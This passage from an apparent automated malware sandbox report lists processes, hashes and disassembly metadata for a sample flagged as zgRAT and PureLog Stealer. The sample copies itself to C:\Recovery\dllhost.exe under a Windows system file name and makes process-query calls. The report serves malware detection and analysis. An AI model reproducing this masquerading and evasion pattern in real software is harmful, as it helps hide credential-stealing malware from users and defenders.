                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:37
                                    Start time:09:43:23
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\chcp.com
                                    Wow64 process (32bit):false
                                    Commandline:chcp 65001
                                    Imagebase:0x7ff6edda0000
                                    File size:14'848 bytes
                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:38
                                    Start time:09:43:23
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\PING.EXE
                                    Wow64 process (32bit):false
                                    Commandline:ping -n 10 localhost
                                    Imagebase:0x7ff736290000
                                    File size:22'528 bytes
                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:39
                                    Start time:09:43:24
                                    Start date:25/08/2024
                                    Path:C:\Bridgemonitor\BridgeInto.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Bridgemonitor\BridgeInto.exe
                                    Imagebase:0xad0000
                                    File size:1'960'448 bytes
                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:40
                                    Start time:09:43:24
                                    Start date:25/08/2024
                                    Path:C:\Bridgemonitor\BridgeInto.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Bridgemonitor\BridgeInto.exe
                                    Imagebase:0xe60000
                                    File size:1'960'448 bytes
                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:41
                                    Start time:09:43:25
                                    Start date:25/08/2024
                                    Path:C:\Recovery\dllhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Recovery\dllhost.exe
                                    Imagebase:0xc70000
                                    File size:1'960'448 bytes
                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\dllhost.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\dllhost.exe, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 100%, ReversingLabs
                                    Has exited:true

                                    General

                                    Target ID:42
                                    Start time:09:43:25
                                    Start date:25/08/2024
                                    Path:C:\Recovery\dllhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Recovery\dllhost.exe
                                    Imagebase:0x950000
                                    File size:1'960'448 bytes
                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:2.1%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:20%
                                      Total number of Nodes:5
                                      Total number of Limit Nodes:0

                                      Executed Functions

                                      Function 04D5685F Relevance: 3.0, APIs: 2, Instructions: 31nativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 4d5685f-4d568a6 NtQueryInformationProcess GetSystemInfo
                                      APIs
                                      • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 04D56875
                                      • GetSystemInfo.KERNELBASE(?), ref: 04D56887
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2134426104.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4d50000_Fatality.jbxd
                                      Similarity
                                      • API ID: InfoInformationProcessQuerySystem
                                      • String ID:
                                      • API String ID: 1993426926-0
                                      • Opcode ID: 334262aaaa4332ec87f7b9c58f6a6bc8a8b7a8d6b543afa9797abe839731536b
                                      • Instruction ID: 0d9dc9a25d292edc6cbdadc0005df3eb32f239d2f47e12abb35e4bb9f76c6ac3
                                      • Opcode Fuzzy Hash: 334262aaaa4332ec87f7b9c58f6a6bc8a8b7a8d6b543afa9797abe839731536b
                                      • Instruction Fuzzy Hash: 19F0FE76600219AFCB159F5AD849EDE7BA9EB49790B014015BD15E7250DB309901CBA0
                                      Function 04D566FC Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 60 4d566fc-4d5670f RtlExitUserProcess 61 4d5671c-4d567f5 60->61
                                      APIs
                                      • RtlExitUserProcess.NTDLL(?,77E8F3B0,000000FF), ref: 04D56709
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2134426104.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4d50000_Fatality.jbxd
                                      Similarity
                                      • API ID: ExitProcessUser
                                      • String ID:
                                      • API String ID: 3902816426-0
                                      • Opcode ID: 457113bb015e71bdd2164b67245766c57edae6f87edb57fe93816350df76cb5d
                                      • Instruction ID: 33fb2a0b6d35ebf30d5b52456fb034446e07106989c7b01f4bc063ba5a66e552
                                      • Opcode Fuzzy Hash: 457113bb015e71bdd2164b67245766c57edae6f87edb57fe93816350df76cb5d
                                      • Instruction Fuzzy Hash: 60312AB2D1060CAFDB01CFD1C849BEEBBB9FB14336F21461AE521A6180D7785A088F60
                                      Function 00AEF598 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 66 aef598-aef5a3 67 aef5ac-aef5af 66->67 68 aef5a5-aef5aa 66->68 69 aef5b6-aef5ca VirtualAlloc 67->69 70 aef5b1 67->70 68->69 70->69
                                      APIs
                                      • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00AEF5C3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2133322697.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp, Offset: 00982000, based on PE: true
                                      • Associated: 00000000.00000002.2133322697.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2133322697.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2133322697.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_890000_Fatality.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 2d754ba70357134bb1bda5704d546edec6076563c3be4aa21c32559dee696d27
                                      • Instruction ID: 5842adc24d3e2466c747e77c8383129f6378568ac83a843bb33002e1e14e18bd
                                      • Opcode Fuzzy Hash: 2d754ba70357134bb1bda5704d546edec6076563c3be4aa21c32559dee696d27
                                      • Instruction Fuzzy Hash: 11E0E2B6300248AFDB10CE8DD984BAA33ADE7A8310F108022FA09D7244C234EC109B75

                                      Non-executed Functions

                                      Function 04D54571 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2134426104.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4d50000_Fatality.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: b=q=
                                      • API String ID: 0-4069823217
                                      • Opcode ID: 1eea809ff47755f36f4d44d512b906b218fed69a3a009f451abeb400a6c7ed6b
                                      • Instruction ID: 85a17c62061f2cebd06cea74c3e966c9c8b5cf5c10a6cff03fa6f4bcada07484
                                      • Opcode Fuzzy Hash: 1eea809ff47755f36f4d44d512b906b218fed69a3a009f451abeb400a6c7ed6b
                                      • Instruction Fuzzy Hash: 33314631549396AFCB328E3884A13C7BFE2AF562013E659AFC4C08B406D72154C7DB87
                                      Function 009930B6 Relevance: .8, Instructions: 811COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2133322697.0000000000982000.00000040.00000001.01000000.00000003.sdmp, Offset: 00982000, based on PE: true
                                      • Associated: 00000000.00000002.2133322697.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2133322697.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2133322697.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_890000_Fatality.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0808f1a434eba70c5827684152b3468975e9ea97352dac9f2d26535adab3be0f
                                      • Instruction ID: 90daf189f63cdbc19fd03fac4175d8c0b5510ba17363d08faeb85bfd351d7a7d
                                      • Opcode Fuzzy Hash: 0808f1a434eba70c5827684152b3468975e9ea97352dac9f2d26535adab3be0f
                                      • Instruction Fuzzy Hash: A802F50104D3C5AFCB124B785D6B9693FAD9A0320071BC0DA96CA6A9A3E50B1F1FD736
                                      Function 04D56071 Relevance: .2, Instructions: 201COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2134426104.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4d50000_Fatality.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f4e4fd7c14cf299149dc289b34e608c463a9bc0b2b6099f3b3778437b4cfc2ec
                                      • Instruction ID: 3b1f6743c394aa3fc5802f77949fc75730ae0c9b42fbfab9a98173913d76f6f8
                                      • Opcode Fuzzy Hash: f4e4fd7c14cf299149dc289b34e608c463a9bc0b2b6099f3b3778437b4cfc2ec
                                      • Instruction Fuzzy Hash: 27815D76D0122A8FCFA5DF25CD886A9B7B5AF44701F5681DADC0AB3250EB315E85CF40
                                      Function 04D56396 Relevance: .2, Instructions: 165COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2134426104.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4d50000_Fatality.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 80ce55ebeb7bf2b22fe6f36d6edc396e0e641356ce03f58a1c782874589ff798
                                      • Instruction ID: c8bb727a293c23f69e4de50643553fe2ddd5dc986fc501b842b1e242c9b9ec0e
                                      • Opcode Fuzzy Hash: 80ce55ebeb7bf2b22fe6f36d6edc396e0e641356ce03f58a1c782874589ff798
                                      • Instruction Fuzzy Hash: BF615E75D0122A9FCFA59F29CC886D9B7B5BF44311F1282D9D84EA3250EB309E85DF50

                                      Execution Graph

                                      Execution Coverage:11.1%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:3
                                      Total number of Limit Nodes:0
                                      execution_graph 7254 7ffd34a5de01 7256 7ffd34a5de1f QueryFullProcessImageNameA 7254->7256 7257 7ffd34a5dfc4 7256->7257

                                      Executed Functions

                                      Function 00007FFD34660D4C Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 261 7ffd34660d4c-7ffd34660e8b call 7ffd346607f8 277 7ffd34660e8c-7ffd34660eb9 261->277 280 7ffd34660ebb-7ffd34660f05 277->280 284 7ffd34660f1e 280->284 285 7ffd34660f07-7ffd34660f1d 280->285 286 7ffd34660f1f-7ffd34660f67 284->286 285->284 285->286 291 7ffd34660f6f-7ffd34661050 286->291
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5[_H
                                      • API String ID: 0-3279724263
                                      • Opcode ID: 01c3e6eb105984567f8cc2edc9ad346dac48fa6647ca47959d292b2ebb4ffd7f
                                      • Instruction ID: 228a4634f1a5e3cefb4d927a8783be6d23821283d1921ed9593ade828825dbe6
                                      • Opcode Fuzzy Hash: 01c3e6eb105984567f8cc2edc9ad346dac48fa6647ca47959d292b2ebb4ffd7f
                                      • Instruction Fuzzy Hash: 5591C075A18B998FE799DB68C8653E97FE1FBA6310F4001BAD049D77E2DB7828118700
                                      Function 00007FFD34660E43 Relevance: .2, Instructions: 172COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 29252e8a8717177a7ffb201379e2140d35dc89495411e8b0c232c80169d3665d
                                      • Instruction ID: f29311b70afa68e5274bed3d22df5868ebdb0c6c4d5c20ff0a8c9a5d48705f4c
                                      • Opcode Fuzzy Hash: 29252e8a8717177a7ffb201379e2140d35dc89495411e8b0c232c80169d3665d
                                      • Instruction Fuzzy Hash: E351D076A18A598AE798CF5CD4A53E97FE1FB96324F50017ED04ED7BE1CBB924118300
                                      Function 00007FFD34A5DE01 Relevance: 1.8, APIs: 1, Instructions: 255COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2356110070.00007FFD34A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34a50000_BridgeInto.jbxd
                                      Similarity
                                      • API ID: FullImageNameProcessQuery
                                      • String ID:
                                      • API String ID: 3578328331-0
                                      • Opcode ID: 544e5d47f5bc49c3d9cdb4906f975a9a7ff183d0d2d3da059173d00f2a19d087
                                      • Instruction ID: 75238918e139148484ffacbf7d8940d9b9ef408a30f2ff456341dc3a9ae943a6
                                      • Opcode Fuzzy Hash: 544e5d47f5bc49c3d9cdb4906f975a9a7ff183d0d2d3da059173d00f2a19d087
                                      • Instruction Fuzzy Hash: 8671B530608A4D8FEB68DF18D8957F937D1FB59315F10827EE88EC7292CA74A845CB81
                                      Function 00007FFD346608D0 Relevance: .2, Instructions: 172COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f8f89c2af38154685882b8c913a25c3a40d79ac6441385e9cd1d86bba35cd896
                                      • Instruction ID: a5a781480da0929e21ce484a1a0ef0528309e29adb27029b0eef7fb77d158f55
                                      • Opcode Fuzzy Hash: f8f89c2af38154685882b8c913a25c3a40d79ac6441385e9cd1d86bba35cd896
                                      • Instruction Fuzzy Hash: 4E41013260CA654FD714EBACE4A99FA7BD0EF9632570405BBD189CB063DE18A8818781
                                      Function 00007FFD3466090D Relevance: .2, Instructions: 150COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b0faa3bca52946eda69caba672f4091ff12f5c3dd8b8dbe0efc4bda923dff6c0
                                      • Instruction ID: abcd64fb8889c70ad2ba554feb1127be5b2a82d2e250744976aa671f6916a34d
                                      • Opcode Fuzzy Hash: b0faa3bca52946eda69caba672f4091ff12f5c3dd8b8dbe0efc4bda923dff6c0
                                      • Instruction Fuzzy Hash: A0412822B4D6A61EE714B7F8A4BA1FA7B90DF96335B1404BFD18EC7193CD1C68428285
                                      Function 00007FFD34660908 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b3368c1844a52ee59a3a97208f294735a0dec08c23f3eb80fd00a53f5a0f1fa5
                                      • Instruction ID: 3d52de3f35f9df7d9a6e88d21c665eabbc96a3d462fb370a86da02dbd3812ebe
                                      • Opcode Fuzzy Hash: b3368c1844a52ee59a3a97208f294735a0dec08c23f3eb80fd00a53f5a0f1fa5
                                      • Instruction Fuzzy Hash: 3121073130CC184FE768EE0CE88ADB973D1EF9A32130101BAE58EC7126E915EC8287C1
                                      Function 00007FFD34660960 Relevance: .1, Instructions: 116COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 68319210771e503bc1bd2d4c272f9361d47d9ad1f178c8f0571009744010f15d
                                      • Instruction ID: fc941c294c527955a7407b0f45bb08b4f421792b112c818afa1633e4dbd86ba1
                                      • Opcode Fuzzy Hash: 68319210771e503bc1bd2d4c272f9361d47d9ad1f178c8f0571009744010f15d
                                      • Instruction Fuzzy Hash: F3313422B0DA661EF764B6BCA4AA1FA77C1DF96335B1404BED54EC31D3CC1CAC429285
                                      Function 00007FFD3466116D Relevance: .1, Instructions: 115COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6ed2e222420d82db788cc6811310a30d5b6811191ee7e64544646f645b00725c
                                      • Instruction ID: e6b6bca873c3a0d9548daf5134fc43341b4eee5e68fbb1b1e3f3c976fb654768
                                      • Opcode Fuzzy Hash: 6ed2e222420d82db788cc6811310a30d5b6811191ee7e64544646f645b00725c
                                      • Instruction Fuzzy Hash: 0B41B731A0965A4FDB89EF78C8A59F97BE1FF5A310B0401BAD049D71A2DB2DA841CB40
                                      Function 00007FFD34660998 Relevance: .1, Instructions: 106COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bb2d5891bb9e982b7c7c1296d6640164f86b78fdce25164217bc38777de77b22
                                      • Instruction ID: 64aa19e1a0259f0dc7cb1ab052a9b3c8c22d0cab0be6ba42f0b5c5e66ae6e7bd
                                      • Opcode Fuzzy Hash: bb2d5891bb9e982b7c7c1296d6640164f86b78fdce25164217bc38777de77b22
                                      • Instruction Fuzzy Hash: E731FC21B0D9650FF758FA6C94AA6B577D1EF9A321B1400BDD54EC32E3DD2CAC429341
                                      Function 00007FFD34660C25 Relevance: .1, Instructions: 98COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7314784434b064d1b9fe0bf3d823d5c700137dd51bfb9b78225089377983d5d5
                                      • Instruction ID: 5652f8ea6a3a11b831a479c6b5373e3631364fd11e2720dff96c34f47ef8f767
                                      • Opcode Fuzzy Hash: 7314784434b064d1b9fe0bf3d823d5c700137dd51bfb9b78225089377983d5d5
                                      • Instruction Fuzzy Hash: 75310A75B0DA598EE711DF68D8A12ED7BA0EF82335F1441B6D148DA1C3DB3C244AA781
                                      Function 00007FFD346669E3 Relevance: .1, Instructions: 68COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a19eb63c6d41be002615b76dc45e7413c441f7830d2ecae948832b5f13054aef
                                      • Instruction ID: 9016c4a956f221bdf9eca82763e03e7a1913cb0c74eaf9177d8eed898c32298a
                                      • Opcode Fuzzy Hash: a19eb63c6d41be002615b76dc45e7413c441f7830d2ecae948832b5f13054aef
                                      • Instruction Fuzzy Hash: 55211D30E185698FDB65DF04D4A47E9B3E1FB58314F1085AAC50EE3291CB79AE81CB80
                                      Function 00007FFD34660C38 Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dbbcf8acb9f51da5d05d257d3922716d4595ef210c8aea85a61948bcadda95b2
                                      • Instruction ID: fe16f8f18c2d9d1dcd906e647ea9328d9c6a4d413458201c095d242eb62683d9
                                      • Opcode Fuzzy Hash: dbbcf8acb9f51da5d05d257d3922716d4595ef210c8aea85a61948bcadda95b2
                                      • Instruction Fuzzy Hash: DA11C275B0DA999FE712DF6888A11ED7BB0EF83321F1544B7C244DB182DA3C254AA790
                                      Function 00007FFD34660C40 Relevance: .0, Instructions: 50COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 793ee1beab58696b812ab94413fe63b1aaf5d66ff193e429914ce17cae4dcbae
                                      • Instruction ID: 70daf8ae526e94243236b2d1610c938a1a23082825e02f70d88f78fa486f0525
                                      • Opcode Fuzzy Hash: 793ee1beab58696b812ab94413fe63b1aaf5d66ff193e429914ce17cae4dcbae
                                      • Instruction Fuzzy Hash: 7E11AD75A0EA999FE712DF6888A01ED7BB0EF43321F1541B6C144DB192DA3C6A49A780
                                      Function 00007FFD34660C48 Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b508626ef6dacf0e9819857b53dc8f4a128181173a9a274d5f97f14ca55e2be2
                                      • Instruction ID: 4c14627fc67d2f5f8949c9be0efbc9b8ea393549d39e75a4a453d9f374aae551
                                      • Opcode Fuzzy Hash: b508626ef6dacf0e9819857b53dc8f4a128181173a9a274d5f97f14ca55e2be2
                                      • Instruction Fuzzy Hash: 4F018C75A0E6899FE712DF6488A00ED7BB0EF43320F1541F6D144DB192DA3C6A45A781
                                      Function 00007FFD34660B9A Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                      • Instruction ID: 7cad4ae71697c65f5ed97aa7d4d5c5b881b8cdf4fc4a5a73e8da78e10dab1e8d
                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                      • Instruction Fuzzy Hash: FDD012345668098FC650EB28D9D5494BA90FB0A214B8901D0D40CC7161E35A9894D701
                                      Function 00007FFD346606A5 Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d18e80f510b7454b457dd04e8256d1bc12cc23cb8ed179144c3c259b6b8a5607
                                      • Instruction ID: 50fc309d7be4ce434981161fbdfa8ee0cd7a09ae06c083863559a47766ec0d02
                                      • Opcode Fuzzy Hash: d18e80f510b7454b457dd04e8256d1bc12cc23cb8ed179144c3c259b6b8a5607
                                      • Instruction Fuzzy Hash: 3BC04C05F5ED7B41B815BD6E58E60ECA2415BD7631FD51172D70CD00C5DD8D20D52156
                                      Function 00007FFD346612B8 Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                      • Instruction ID: b395b07e5ed02f210e8e693a1abc5eeb5c622c5f434b05e4c49dcc7ab2ed59d8
                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                      • Instruction Fuzzy Hash: 50C04C346518098FCA48EB2DC99595477A0FB1A215BD50094E40DC7171D65DDCD5D741
                                      Function 00007FFD34663416 Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d6521fdf2448a8dcf6ff1a61f26947fcb15f0ec190ef722e53471eb9efc31ae1
                                      • Instruction ID: b1167e313cf088a83d0ae6b1e2fb6a4f14872fb15b4d19209e6f93ed71937a4f
                                      • Opcode Fuzzy Hash: d6521fdf2448a8dcf6ff1a61f26947fcb15f0ec190ef722e53471eb9efc31ae1
                                      • Instruction Fuzzy Hash: 09C08C01F0892642F225628480312BE04429F40318F400030E00ED63D6CE0C5F0112C2
                                      Function 00007FFD346606C8 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
